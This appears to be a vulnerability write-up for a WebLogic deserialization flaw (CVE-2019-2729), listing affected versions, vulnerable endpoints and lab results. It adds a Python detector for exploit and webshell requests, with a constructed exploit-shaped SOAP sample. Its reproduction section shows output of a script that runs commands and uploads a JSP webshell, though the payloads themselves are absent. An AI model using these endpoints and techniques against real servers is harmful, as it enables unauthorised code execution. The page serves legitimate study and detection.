WebLogic — CVE-2019-2729
Background
WebLogic wls-wsat Deserialization RCE
- CVSS
- VECTOR
- IMPACT
- AFFECTED: WebLogic ≤ 10.3.6.0 (without the Jun 2019 CPU)
- WebLogic ≤ 12.1.3.0 (without the Jun 2019 CPU)
- WebLogic ≤ 12.2.1.3 (without the Jun 2019 CPU)
An unauthenticated remote code execution vulnerability in wls-wsat.war and wls9_async_response.war, caused by unsafe deserialization of Java objects carried in the HTTP request. A remote attacker sends a crafted serialized Java object over HTTP and executes arbitrary code as the user running the WebLogic server process. Exploitation through wls-wsat.war returns the command output in the HTTP response; exploitation through wls9_async_response.war is blind (no output is returned, so confirmation needs a side effect such as a dropped file or an out-of-band callback).
Vulnerable endpoints
wls-wsat.war (returns output):
- /wls-wsat/CoordinatorPortType
- /wls-wsat/RegistrationPortTypeRPC
- /wls-wsat/ParticipantPortType
- /wls-wsat/RegistrationRequesterPortType
- /wls-wsat/CoordinatorPortType11
- /wls-wsat/RegistrationPortTypeRPC11
- /wls-wsat/ParticipantPortType11
- /wls-wsat/RegistrationRequesterPortType11
wls9_async_response.war (blind):
/_async/AsyncResponseService
Tested environments
| Version | Image | Result | Reason |
|---|---|---|---|
| 10.3.6.0 | vulhub/weblogic:10.3.6.0-2017 | Vulnerable | wls-wsat deserialization |
| 12.2.1.3 | vulhub/weblogic:12.2.1.3-2018 | Not vulnerable | Endpoints missing |
| 12.2.1.3 | vulhub/weblogic:12.2.1.3 | Not vulnerable | Endpoints missing |
| 12.2.1.3 | weblogic:12.2.1.3 | Inconclusive | "Old format work area header is disabled." |
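On the defensive side, the following is an added detection example (not code from the PoC) that classifies HTTP request records against the patterns documented on this page: POSTs to the deserialization endpoints listed above, and GETs to a .jsp directly under /_async/ carrying a cmd parameter, which is how the uploaded webshell is driven in the reproduction output below. It also checks two body markers, the WorkContext SOAP header namespace and a java.beans.XMLDecoder element; those are assumptions about what the payload files contain (the page does not show them) and should be tuned against real traffic. The sample requests are constructed.

```python
"""Flag HTTP requests that look like CVE-2019-2729 exploitation or webshell use.

Added example, not part of the original PoC. Input is a list of
(method, request-target, body) tuples, e.g. reconstructed from a reverse
proxy or WAF log that retains request bodies. The endpoint paths and the
/_async/<name>.jsp?cmd= pattern come from the page; the two body markers
(WorkContext namespace, java.beans.XMLDecoder) are an assumption about what
the payload files contain.
"""
import re
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

DESER_ENDPOINTS = {
    "/wls-wsat/CoordinatorPortType",
    "/wls-wsat/RegistrationPortTypeRPC",
    "/wls-wsat/ParticipantPortType",
    "/wls-wsat/RegistrationRequesterPortType",
    "/wls-wsat/CoordinatorPortType11",
    "/wls-wsat/RegistrationPortTypeRPC11",
    "/wls-wsat/ParticipantPortType11",
    "/wls-wsat/RegistrationRequesterPortType11",
    "/_async/AsyncResponseService",
}

# Assumed payload markers (not shown on the page): the WorkContext SOAP
# header namespace and an XMLDecoder element inside the request body.
WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"
XMLDECODER_RE = re.compile(r'class\s*=\s*"java\.beans\.XMLDecoder"', re.IGNORECASE)

# Any .jsp directly under /_async/ reached with a cmd query parameter, as in
# the reproduction output (/_async/<random>.jsp?cmd=whoami).
ASYNC_JSP_RE = re.compile(r"^/_async/[^/]+\.jsp$")


def classify_request(method: str, target: str, body: str = "") -> List[str]:
    """Return the matched indicator names (empty list means nothing matched)."""
    parts = urlsplit(target)
    reasons: List[str] = []
    if method.upper() == "POST" and parts.path in DESER_ENDPOINTS:
        reasons.append("post-to-deserialization-endpoint")
    if WORKAREA_NS in body:
        reasons.append("workcontext-header")
    if XMLDECODER_RE.search(body):
        reasons.append("xmldecoder-in-body")
    if ASYNC_JSP_RE.match(parts.path) and "cmd" in parse_qs(parts.query):
        reasons.append("async-jsp-webshell-access")
    return reasons


def scan(requests: List[Tuple[str, str, str]]) -> List[Tuple[str, str, List[str]]]:
    """Return (method, target, reasons) for every request that matched at least one indicator."""
    hits = []
    for method, target, body in requests:
        reasons = classify_request(method, target, body)
        if reasons:
            hits.append((method, target, reasons))
    return hits


# Constructed sample traffic: one exploit-shaped POST, one webshell command,
# one harmless browse of the same servlet, one unrelated console login.
SAMPLE_REQUESTS = [
    ("POST", "/wls-wsat/CoordinatorPortType",
     '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
     '<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
     '<java class="java.beans.XMLDecoder"></java></work:WorkContext></soapenv:Header>'
     '<soapenv:Body/></soapenv:Envelope>'),
    ("GET", "/_async/.s8Jn4gWlqX2c592.jsp?cmd=whoami", ""),
    ("GET", "/wls-wsat/CoordinatorPortType", ""),
    ("POST", "/console/j_security_check", "j_username=weblogic&j_password=REDACTED"),
]

if __name__ == "__main__":
    for method, target, reasons in scan(SAMPLE_REQUESTS):
        print(f"{method} {target} -> {', '.join(reasons)}")
```

A plain GET to a wls-wsat path is deliberately not flagged on its own: the servlets answer GETs with a service page, so only the POST (where the object graph travels) and the body markers are treated as signals. The /_async/ webshell rule is the higher-confidence one, because a .jsp being served from that context should not happen on a clean install.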
Reproduction
POC || GTFO
File(s): weblogic_get_webshell.py, payload.txt, payload2.txt, payload3.txt
weblogic_get_webshell.py sends the three payloads (payload.txt, payload2.txt, payload3.txt) to the target in a single invocation: payload2.txt executes a command through a wls-wsat endpoint and prints the returned output, and payload.txt uploads a JSP webshell which the script then drives directly through the /_async/ endpoint with a cmd parameter:
```zsh
» python3 weblogic_get_webshell.py http://127.0.0.1:7003
--- payload2.txt (weblogic 10.3.6) ---
http://127.0.0.1:7003/wls-wsat/CoordinatorPortType
whoami :
root
--- payload.txt, uploading webshell '.s8Jn4WlqX2c592.jsp' ---
http://127.0.0.1:7003/_async/.s8Jn4gWlqX2c592.jsp?cmd=whoami
Cookie:JSESSIONID=DxZLnCLX1y5BPn1Yw9GrpYVFR0NQQhyrk1qFXsQ1Pz2qQbW1lyKR!903277329; path=/; HttpOnly
whoami:
root
```
References